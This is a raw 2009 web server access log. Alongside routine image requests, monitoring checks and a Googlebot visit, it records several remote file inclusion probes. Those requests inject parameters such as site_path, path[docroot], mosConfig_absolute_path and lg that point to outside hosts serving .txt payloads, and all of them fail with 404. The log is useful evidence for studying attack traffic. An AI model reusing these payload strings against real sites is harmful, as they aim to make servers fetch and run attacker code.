201.171.82.222 - - [17/May/2009:03:44:37 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
201.171.82.222 - - [17/May/2009:03:44:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2081234811F1B700591D04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={0D3FB103-2BD7-11DE-9E82-002185C264F9}; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [17/May/2009:03:47:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [17/May/2009:03:49:29 -0400] "GET /logs/access_log.Q108091800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.221.119.126 - - [17/May/2009:03:50:09 -0400] "GET /logs/access_log.Q108122100//include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:03:50:32 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.92 - - [17/May/2009:03:51:09 -0400] "GET //include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:03:51:09 -0400] "GET /logs//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:03:51:09 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
110.45.145.92 - - [17/May/2009:03:51:24 -0400] "GET /logs/access_log.Q108122500//include.php?path[docroot]=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
122.153.212.195 - - [17/May/2009:03:51:42 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:03:51:42 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:03:51:42 -0400] "GET /logs/access_log.Q108082500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:03:51:42 -0400] "GET /logs/access_log.Q108082900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:03:52:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.107.138.34 - - [17/May/2009:03:52:23 -0400] "GET /logs/access_log.Q109022600/index.php?lg=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:03:52:23 -0400] "GET /logs/index.php?lg=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
